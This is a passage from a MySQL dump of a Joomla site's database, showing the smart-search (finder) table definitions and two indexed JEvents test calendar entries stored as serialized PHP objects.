2ZWxvcGVycy8yMDE2LzA2L2FwaS12MS1kZXByZWNhdGVkLyBQbGVhc2UgdXNlIHRoZSBEcm9wYm94IEFQSSB2MiBpbnRlZ3JhdGlvbiBpbnN0ZWFkLjwvbGk+PC91bD4iO30=\\\"\",\"lastversion\":\"3.9.1\",\"minstability\":\"stable\",\"acceptlicense\":true,\"acceptsupport\":true,\"acceptbackuptest\":true,\"angieupgrade\":0}','','',0,'0000-00-00 00:00:00',0,0); /*!40000 ALTER TABLE `jos_extensions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_filters` -- DROP TABLE IF EXISTS `jos_finder_filters`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_filters` ( `filter_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(255) NOT NULL, `alias` varchar(255) NOT NULL, `state` tinyint(1) NOT NULL DEFAULT '1', `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL, `created_by_alias` varchar(255) NOT NULL, `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `map_count` int(10) unsigned NOT NULL DEFAULT '0', `data` text NOT NULL, `params` mediumtext, PRIMARY KEY (`filter_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_filters` -- LOCK TABLES `jos_finder_filters` WRITE; /*!40000 ALTER TABLE `jos_finder_filters` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_filters` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links` -- DROP TABLE IF EXISTS `jos_finder_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links` ( `link_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `url` varchar(255) NOT NULL, `route` varchar(255) NOT NULL, `title` varchar(255) DEFAULT NULL, `description` varchar(255) DEFAULT NULL, `indexdate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `md5sum` varchar(32) DEFAULT NULL, `published` tinyint(1) NOT NULL DEFAULT '1', `state` int(5) DEFAULT '1', `access` int(5) DEFAULT '0', `language` varchar(8) NOT NULL, `publish_start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `list_price` double unsigned NOT NULL DEFAULT '0', `sale_price` double unsigned NOT NULL DEFAULT '0', `type_id` int(11) NOT NULL, `object` mediumblob NOT NULL, PRIMARY KEY (`link_id`), KEY `idx_type` (`type_id`), KEY `idx_title` (`title`), KEY `idx_md5` (`md5sum`), KEY `idx_url` (`url`(75)), KEY `idx_published_list` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`list_price`), KEY `idx_published_sale` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`sale_price`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links` -- LOCK TABLES `jos_finder_links` WRITE; /*!40000 ALTER TABLE `jos_finder_links` DISABLE KEYS */; INSERT INTO `jos_finder_links` VALUES (1,'index.php?option=com_jevents&task=icalevent.detail&evid=&Itemid=0','index.php?option=com_jevents&task=icalevent.detail&evid=&Itemid=0','Test 123','Testing event calendar for this month...','2013-06-13 00:58:58','da19dddc61a9296728c7bba15d8843a9',1,1,0,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,0,2,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:17:{s:8:\"evdet_id\";s:1:\"2\";s:7:\"summary\";s:47:\"<p>Testing event calendar for this month...</p>\";s:4:\"body\";s:47:\"<p>Testing event calendar for this month...</p>\";s:8:\"modified\";s:19:\"2013-06-13 00:58:57\";s:5:\"rp_id\";N;s:7:\"eventid\";N;s:5:\"catid\";N;s:5:\"icsid\";N;s:10:\"created_by\";N;s:8:\"category\";N;s:9:\"cat_state\";N;s:10:\"cat_access\";N;s:6:\"author\";N;s:6:\"layout\";s:5:\"event\";s:6:\"params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":120:{s:15:\"com_calViewName\";s:7:\"geraint\";s:12:\"darktemplate\";s:1:\"1\";s:14:\"com_dateformat\";s:1:\"1\";s:15:\"com_calHeadline\";s:4:\"menu\";s:16:\"com_calUseIconic\";s:1:\"1\";s:11:\"iconstoshow\";a:5:{i:0;s:6:\"byyear\";i:1;s:7:\"bymonth\";i:2;s:6:\"byweek\";i:3;s:5:\"byday\";i:4;s:6:\"search\";}s:15:\"com_navbarcolor\";s:5:\"green\";s:16:\"com_earliestyear\";s:4:\"2000\";s:14:\"com_latestyear\";s:4:\"2015\";s:11:\"com_starday\";s:1:\"0\";s:19:\"com_print_icon_view\";s:1:\"1\";s:19:\"com_email_icon_view\";s:1:\"1\";s:13:\"com_copyright\";s:1:\"0\";s:13:\"showPanelNews\";s:1:\"1\";s:10:\"mergemenus\";s:1:\"1\";s:15:\"show_adminpanel\";s:1:\"1\";s:16:\"icaltimezonelive\";s:16:\"America/New_York\";s:11:\"regexsearch\";s:1:\"1\";s:12:\"catseparator\";s:1:\"|\";s:9:\"com_cache\";s:1:\"0\";s:6:\"newsef\";s:1:\"0\";s:15:\"com_blockRobots\";s:1:\"1\";s:10:\"robotprior\";s:8:\"-1 month\";s:9:\"robotpost\";s:8:\"+1 month\";s:14:\"redirectrobots\";s:1:\"0\";s:13:\"robotmenuitem\";s:0:\"\";s:8:\"blockall\";s:1:\"0\";s:17:\"largeDataSetLimit\";s:6:\"100000\";s:8:\"jevadmin\";s:1:\"0\";s:14:\"authorisedonly\";s:1:\"0\";s:13:\"jevpublishown\";s:1:\"0\";s:5:\"rules\";O:8:\"stdClass\":7:{s:11:\"core.manage\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:11:\"core.create\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:13:\"core.edit.own\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:9:\"core.edit\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:15:\"core.edit.state\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:14:\"core.deleteall\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:10:\"core.admin\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}}s:12:\"icaltimezone\";s:16:\"America/New_York\";s:7:\"icalkey\";s:13:\"SECRET_PHRASE\";s:12:\"showicalicon\";s:1:\"0\";s:17:\"disableicalexport\";s:1:\"0\";s:12:\"icalmultiday\";s:1:\"0\";s:15:\"icalmultiday24h\";s:1:\"0\";s:8:\"feimport\";s:1:\"0\";s:9:\"allowedit\";s:1:\"0\";s:13:\"icalformatted\";s:1:\"0\";s:17:\"com_calUseStdTime\";s:1:\"1\";s:13:\"multicategory\";s:1:\"0\";s:18:\"com_editdateformat\";s:5:\"Y-m-d\";s:9:\"editpopup\";s:1:\"0\";s:14:\"disablerepeats\";s:1:\"0\";s:6:\"popupw\";s:3:\"800\";s:6:\"popuph\";s:3:\"500\";s:10:\"defaultcat\";s:1:\"0\";s:18:\"forcepopupcalendar\";s:1:\"1\";s:29:\"com_calForceCatColorEventForm\";s:1:\"2\";s:20:\"com_single_pane_edit\";s:1:\"0\";s:21:\"timebeforedescription\";s:1:\"0\";s:23:\"com_show_editor_buttons\";s:1:\"0\";s:28:\"com_editor_button_exceptions\";s:18:\"pagebreak,readmore\";s:14:\"com_notifyboth\";s:1:\"0\";s:19:\"com_notifyallevents\";s:1:\"0\";s:16:\"com_notifyauthor\";s:1:\"0\";s:12:\"showpriority\";s:1:\"0\";s:8:\"multiday\";s:1:\"1\";s:12:\"checkclashes\";s:1:\"0\";s:9:\"noclashes\";s:1:\"0\";s:12:\"skipreferrer\";s:1:\"0\";s:16:\"defaultstarttime\";s:5:\"08:00\";s:14:\"defaultendtime\";s:5:\"17:00\";s:8:\"allowraw\";s:1:\"0\";s:13:\"notifymessage\";s:210:\"<p>Title : {TITLE} {DESCRIPTION} Event submitted from [ {LIVESITE} ] by [ {AUTHOR} ] View this event : {VIEWLINK} Edit this event : {EDITLINK} Manage your events : <a href=\"{MANAGEEVENTS}\">Manage Events</a></p>\";s:10:\"com_byview\";s:1:\"1\";s:12:\"com_mailview\";s:1:\"1\";s:12:\"com_hitsview\";s:1:\"1\";s:14:\"com_repeatview\";s:1:\"1\";s:20:\"contact_display_name\";s:1:\"0\";s:15:\"redirect_detail\";s:1:\"0\";s:15:\"com_calCutTitle\";s:2:\"15\";s:17:\"com_calMaxDisplay\";s:2:\"15\";s:23:\"com_calDisplayStarttime\";s:1:\"1\";s:17:\"com_enableToolTip\";s:1:\"1\";s:11:\"tooltiptype\";s:6:\"joomla\";s:19:\"com_calTTBackground\";s:1:\"1\";s:13:\"com_calTTPosX\";s:4:\"LEFT\";s:13:\"com_calTTPosY\";s:5:\"BELOW\";s:15:\"com_calTTShadow\";s:1:\"0\";s:16:\"com_calTTShadowX\";s:1:\"0\";s:16:\"com_calTTShadowY\";s:1:\"0\";s:17:\"com_calShowLegend\";s:1:\"1\";s:23:\"com_calEventListRowsPpg\";s:2:\"10\";s:12:\"showyearpast\";s:1:\"1\";s:15:\"com_showrepeats\";s:1:\"1\";s:12:\"showyeardate\";s:1:\"0\";s:13:\"com_rss_cache\";s:1:\"1\";s:18:\"com_rss_cache_time\";s:4:\"3600\";s:13:\"com_rss_count\";s:1:\"5\";s:22:\"com_rss_live_bookmarks\";s:1:\"1\";s:13:\"com_rss_modid\";s:1:\"0\";s:13:\"com_rss_title\";s:27:\"JEvents RSS Feed for Joomla\";s:19:\"com_rss_description\";s:19:\"Powered by JEvents!\";s:18:\"com_rss_limit_text\";s:1:\"0\";s:19:\"com_rss_text_length\";s:2:\"20\";s:12:\"com_rss_logo\";s:0:\"\";s:20:\"modcal_DispLastMonth\";s:2:\"NO\";s:24:\"modcal_DispLastMonthDays\";s:1:\"0\";s:20:\"modcal_DispNextMonth\";s:2:\"NO\";s:24:\"modcal_DispNextMonthDays\";s:1:\"0\";s:19:\"modcal_LinkCloaking\";s:1:\"0\";s:19:\"modlatest_MaxEvents\";s:2:\"10\";s:14:\"modlatest_Mode\";s:1:\"0\";s:14:\"modlatest_Days\";s:1:\"5\";s:8:\"startnow\";s:1:\"0\";s:18:\"modlatest_NoRepeat\";s:1:\"1\";s:18:\"modlatest_multiday\";s:1:\"0\";s:19:\"modlatest_DispLinks\";s:1:\"1\";s:18:\"modlatest_DispYear\";s:1:\"0\";s:22:\"modlatest_DisDateStyle\";s:1:\"0\";s:23:\"modlatest_DisTitleStyle\";s:1:\"0\";s:19:\"modlatest_LinkToCal\";s:1:\"0\";s:22:\"modlatest_LinkCloaking\";s:1:\"0\";s:21:\"modlatest_SortReverse\";s:1:\"0\";s:20:\"modlatest_CustFmtStr\";s:53:\"${eventDate}[!a: - ${endDate(%I:%M%p)}]<br />${title}\";s:13:\"modlatest_RSS\";s:1:\"0\";s:24:\"modlatest_contentplugins\";s:1:\"0\";}}s:8:\"metadata\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":0:{}}s:4:\"path\";s:61:\"component/jevents/icalevent.detail/2013/06/13/-.html?Itemid=0\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:3:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:5:\"Event\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"Event\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:0:\"\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";N;s:5:\"state\";i:0;s:6:\"access\";i:0;}}}s:3:\"url\";s:65:\"index.php?option=com_jevents&task=icalevent.detail&evid=&Itemid=0\";s:5:\"route\";s:65:\"index.php?option=com_jevents&task=icalevent.detail&evid=&Itemid=0\";s:5:\"title\";s:8:\"Test 123\";s:11:\"description\";s:40:\"Testing event calendar for this month...\";s:9:\"published\";N;s:5:\"state\";s:1:\"1\";s:6:\"access\";N;s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"0000-00-00 00:00:00\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(2,'index.php?option=com_jevents&task=icalevent.detail&evid=1&Itemid=0','index.php?option=com_jevents&task=icalevent.detail&evid=1&Itemid=0','Test events 123','test 1234567','2013-06-13 00:46:53','298f98305cefb3c3e6edd1a3b263f619',1,1,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,0,2,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:17:{s:8:\"evdet_id\";s:1:\"1\";s:7:\"summary\";s:19:\"<p>test 1234567</p>\";s:4:\"body\";s:19:\"<p>test 1234567</p>\";s:8:\"modified\";s:19:\"2013-06-13 00:46:53\";s:5:\"rp_id\";s:1:\"1\";s:7:\"eventid\";s:1:\"1\";s:5:\"catid\";s:2:\"10\";s:5:\"icsid\";s:1:\"1\";s:10:\"created_by\";s:2:\"47\";s:8:\"category\";s:7:\"DEFAULT\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:6:\"author\";s:12:\"mikonsulting\";s:6:\"layout\";s:5:\"event\";s:6:\"params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":120:{s:15:\"com_calViewName\";s:7:\"geraint\";s:12:\"darktemplate\";s:1:\"0\";s:14:\"com_dateformat\";s:1:\"1\";s:15:\"com_calHeadline\";s:4:\"menu\";s:16:\"com_calUseIconic\";s:1:\"1\";s:11:\"iconstoshow\";a:5:{i:0;s:6:\"byyear\";i:1;s:7:\"bymonth\";i:2;s:6:\"byweek\";i:3;s:5:\"byday\";i:4;s:6:\"search\";}s:15:\"com_navbarcolor\";s:5:\"green\";s:16:\"com_earliestyear\";s:4:\"2000\";s:14:\"com_latestyear\";s:4:\"2015\";s:11:\"com_starday\";s:1:\"0\";s:19:\"com_print_icon_view\";s:1:\"1\";s:19:\"com_email_icon_view\";s:1:\"1\";s:13:\"com_copyright\";s:1:\"1\";s:13:\"showPanelNews\";s:1:\"1\";s:10:\"mergemenus\";s:1:\"1\";s:15:\"show_adminpanel\";s:1:\"1\";s:16:\"icaltimezonelive\";s:16:\"America/New_York\";s:11:\"regexsearch\";s:1:\"1\";s:12:\"catseparator\";s:1:\"|\";s:9:\"com_cache\";s:1:\"0\";s:6:\"newsef\";s:1:\"0\";s:15:\"com_blockRobots\";s:1:\"1\";s:10:\"robotprior\";s:8:\"-1 month\";s:9:\"robotpost\";s:8:\"+1 month\";s:14:\"redirectrobots\";s:1:\"0\";s:13:\"robotmenuitem\";s:0:\"\";s:8:\"blockall\";s:1:\"0\";s:17:\"largeDataSetLimit\";s:6:\"100000\";s:8:\"jevadmin\";s:1:\"0\";s:14:\"authorisedonly\";s:1:\"0\";s:13:\"jevpublishown\";s:1:\"0\";s:5:\"rules\";O:8:\"stdClass\":7:{s:11:\"core.manage\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:11:\"core.create\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:13:\"core.edit.own\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:9:\"core.edit\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:15:\"core.edit.state\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:14:\"core.deleteall\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}s:10:\"core.admin\";O:8:\"stdClass\":8:{s:1:\"1\";s:0:\"\";s:1:\"6\";s:0:\"\";s:1:\"7\";s:0:\"\";s:1:\"2\";s:0:\"\";s:1:\"3\";s:0:\"\";s:1:\"4\";s:0:\"\";s:1:\"5\";s:0:\"\";s:1:\"8\";s:0:\"\";}}s:12:\"icaltimezone\";s:16:\"America/New_York\";s:7:\"icalkey\";s:13:\"SECRET_PHRASE\";s:12:\"showicalicon\";s:1:\"0\";s:17:\"disableicalexport\";s:1:\"0\";s:12:\"icalmultiday\";s:1:\"0\";s:15:\"icalmultiday24h\";s:1:\"0\";s:8:\"feimport\";s:1:\"0\";s:9:\"allowedit\";s:1:\"0\";s:13:\"icalformatted\";s:1:\"0\";s:17:\"com_calUseStdTime\";s:1:\"1\";s:13:\"multicategory\";s:1:\"0\";s:18:\"com_editdateformat\";s:5:\"Y-m-d\";s:9:\"editpopup\";s:1:\"0\";s:14:\"disablerepeats\";s:1:\"0\";s:6:\"popupw\";s:3:\"800\";s:6:\"popuph\";s:3:\"500\";s:10:\"defaultcat\";s:1:\"0\";s:18:\"forcepopupcalendar\";s:1:\"1\";s:29:\"com_calForceCatColorEventForm\";s:1:\"2\";s:20:\"com_single_pane_edit\";s:1:\"0\";s:21:\"timebeforedescription\";s:1:\"0\";s:23:\"com_show_editor_buttons\";s:1:\"0\";s:28:\"com_editor_button_exceptions\";s:18:\"pagebreak,readmore\";s:14:\"com_notifyboth\";s:1:\"0\";s:19:\"com_notifyallevents\";s:1:\"0\";s:16:\"com_notifyauthor\";s:1:\"0\";s:12:\"showpriority\";s:1:\"0\";s:8:\"multiday\";s:1:\"1\";s:12:\"checkclashes\";s:1:\"0\";s:9:\"noclashes\";s:1:\"0\";s:12:\"skipreferrer\";s:1:\"0\";s:16:\"defaultstarttime\";s:5:\"08:00\";s:14:\"defaultendtime\";s:5:\"17:00\";s:8:\"allowraw\";s:1:\"0\";s:13:\"notifymessage\";s:252:\"<p>Title : {TITLE}<br /><br /> {DESCRIPTION}<br /><br /> Event submitted from [ {LIVESITE} ] by [ {AUTHOR} ]<br /> View this event : {VIEWLINK}<br /> Edit this event : {EDITLINK}<br /> Manage your events : <a href=\"{MANAGEEVENTS}\">Manage Events</a></p>\";s:10:\"com_byview\";s:1:\"1\";s:12:\"com_mailview\";s:1:\"1\";s:12:\"com_hitsview\";s:1:\"1\";s:14:\"com_repeatview\";s:1:\"1\";s:20:\"contact_display_name\";s:1:\"0\";s:15:\"redirect_detail\";s:1:\"0\";s:15:\"com_calCutTitle\";s:2:\"15\";s:17:\"com_calMaxDisplay\";s:2:\"15\";s:23:\"com_calDisplayStarttime\";s:1:\"1\";s:17:\"com_enableToolTip\";s:1:\"1\";s:11:\"tooltiptype\";s:6:\"joomla\";s:19:\"com_calTTBackground\";s:1:\"1\";s:13:\"com_calTTPosX\";s:4:\"LEFT\";s:13:\"com_calTTPosY\";s:5:\"BELOW\";s:15:\"com_calTTShadow\";s:1:\"0\";s:16:\"com_calTTShadowX\";s:1:\"0\";s:16:\"com_calTTShadowY\";s:1:\"0\";s:17:\"com_calShowLegend\";s:1:\"1\";s:23:\"com_calEventListRowsPpg\";s:2:\"10\";s:12:\"showyearpast\";s:1:\"1\";s:15:\"com_showrepeats\";s:1:\"1\";s:12:\"showyeardate\";s:1:\"0\";s:13:\"com_rss_cache\";s:1:\"1\";s:18:\"com_rss_cache_time\";s:4:\"3600\";s:13:\"com_rss_count\";s:1:\"5\";s:22:\"com_rss_live_bookmarks\";s:1:\"1\";s:13:\"com_rss_modid\";s:1:\"0\";s:13:\"com_rss_title\";s:27:\"JEvents RSS Feed for Joomla\";s:19:\"com_rss_description\";s:19:\"Powered by JEvents!\";s:18:\"com_rss_limit_text\";s:1:\"0\";s:19:\"com_rss_text_length\";s:2:\"20\";s:12:\"com_rss_logo\";s:0:\"\";s:20:\"modcal_DispLastMonth\";s:2:\"NO\";s:24:\"modcal_DispLastMonthDays\";s:1:\"0\";s:20:\"modcal_DispNextMonth\";s:2:\"NO\";s:24:\"modcal_DispNextMonthDays\";s:1:\"0\";s:19:\"modcal_LinkCloaking\";s:1:\"0\";s:19:\"modlatest_MaxEvents\";s:2:\"10\";s:14:\"modlatest_Mode\";s:1:\"0\";s:14:\"modlatest_Days\";s:1:\"5\";s:8:\"startnow\";s:1:\"0\";s:18:\"modlatest_NoRepeat\";s:1:\"1\";s:18:\"modlatest_multiday\";s:1:\"0\";s:19:\"modlatest_DispLinks\";s:1:\"1\";s:18:\"modlatest_DispYear\";s:1:\"0\";s:22:\"modlatest_DisDateStyle\";s:1:\"0\";s:23:\"modlatest_DisTitleStyle\";s:1:\"0\";s:19:\"modlatest_LinkToCal\";s:1:\"0\";s:22:\"modlatest_LinkCloaking\";s:1:\"0\";s:21:\"modlatest_SortReverse\";s:1:\"0\";s:20:\"modlatest_CustFmtStr\";s:53:\"${eventDate}[!a: - ${endDate(%I:%M%p)}]<br />${title}\";s:13:\"modlatest_RSS\";s:1:\"0\";s:24:\"modlatest_contentplugins\";s:1:\"0\";}}s:8:\"metadata\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":0:{}}s:4:\"path\";s:63:\"component/jevents/icalevent.detail/2013/06/13/1/-.html?Itemid=0\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:3:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:5:\"Event\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"Event\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:7:\"DEFAULT\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"DEFAULT\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:66:\"index.php?option=com_jevents&task=icalevent.detail&evid=1&Itemid=0\";s:5:\"route\";s:66:\"index.php?option=com_jevents&task=icalevent.detail&evid=1&Itemid=0\";s:5:\"title\";s:15:\"Test events 123\";s:11:\"description\";s:12:\"test 1234567\";s:9:\"published\";N;s:5:\"state\";s:1:\"1\";s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"0000-00-00 00:00:00\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'); /*!40000 ALTER TABLE `jos_finder_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_terms0` -- DROP TABLE IF EXISTS `jos_finder_links_terms0`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_terms0` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_terms0` -- LOCK TABLES `jos_finder_links_terms0` WRITE; /*!40000 ALTER TABLE `jos_finder_links_terms0` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_links_terms0` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_terms1` -- DROP TABLE IF EXISTS `jos_finder_links_terms1`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_terms1` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_terms1` -- LOCK TABLES `jos_finder_links_terms1` WRITE; /*!40000 ALTER TABLE `jos_finder_links_terms1` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_links_terms1` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_terms2` -- DROP TABLE IF EXISTS `jos_finder_links_terms2`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_terms2` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_terms2` -- LOCK TABLES `jos_finder_links_terms2` WRITE; /*!40000 ALTER TABLE `jos_finder_links_terms2` 